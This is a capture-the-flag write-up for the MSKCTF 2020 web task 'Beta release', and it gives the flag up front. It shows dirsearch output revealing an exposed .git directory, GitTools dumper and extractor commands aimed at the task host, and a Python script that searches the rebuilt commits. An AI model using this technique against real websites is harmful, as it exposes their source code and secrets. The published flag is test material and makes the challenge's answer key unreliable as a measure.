Tags: git web python3
Rating:
# Beta release
> Price: **749 points**
>
> Description: **После долгих и упорных стараний мы вот-вот готовы выкатить наш сервис в продакшн и снять с него пометку `beta`. Но ничего ли мы не забыли?**
>
> Flag: **MSKCTF{l34v1g_g1t_f0ld3r_1s_t00_b4d_id34_l0l}**
This `beta` thing got me thinking about *git*, and after running *dirsearch* on this site, we can see this:
```
Target: http://beta-release.tasks.2020.ctf.cs.msu.ru/
[15:43:31] Starting:
[15:43:36] 200 - 12B - /.git/COMMIT_EDITMSG
[15:43:36] 200 - 137B - /.git/config
[15:43:36] 200 - 23B - /.git/HEAD
[15:43:36] 200 - 250B - /.git/info/exclude
[15:43:36] 200 - 73B - /.git/description
[15:43:36] 200 - 691B - /.git/index
[15:43:36] 200 - 10KB - /.git/logs/refs/heads/master
[15:43:36] 200 - 41B - /.git/refs/heads/master
[15:43:36] 200 - 56KB - /.git/logs/HEAD
[15:43:36] 200 - 54B - /.gitignore
[15:43:36] 200 - 54B - /.gitignore/
```
This is git repo! Let's try to `git clone` this.
```
$ git clone http://beta-release.tasks.2020.ctf.cs.msu.ru/.git/
Cloning into 'beta-release.tasks.2020.ctf.cs.msu.ru'...
fatal: repository 'http://beta-release.tasks.2020.ctf.cs.msu.ru/.git/' not found
```
What? Repository not found? But it's there! After doing some research, I find [this](https://github.com/internetwache/GitTools) useful toolkit for git. So, after downloading and extracting the thing, we have 3 files to work with. And after running `gitdumper.sh` and `extractor.sh` on that website, we have *.git* of that site, as well as all commits, that had been made. To find our flag, we have to look in every *main.py* of every commit. Let's automize that with python.
```python
#!/usr/bin/env python3
import os
import sys
""" Do this, to get repo from the site.
os.mkdir('./task')
os.system("./gitdumper.sh http://beta-release.tasks.2020.ctf.cs.msu.ru/.git/ task/git")
os.system("./extractor.sh task/git task/repo")
"""
path = f'{sys.path[0]}/task/repo'
ls = os.listdir(path)
for x in ls:
f = open(f'{path}/{x}/main.py', 'r').read()
if "MSKCTF" in f:
a = f.find('MSKCTF')
b = f.find('}')
# Do this, to find flag offset.
print(f[a:b+1])
break
```
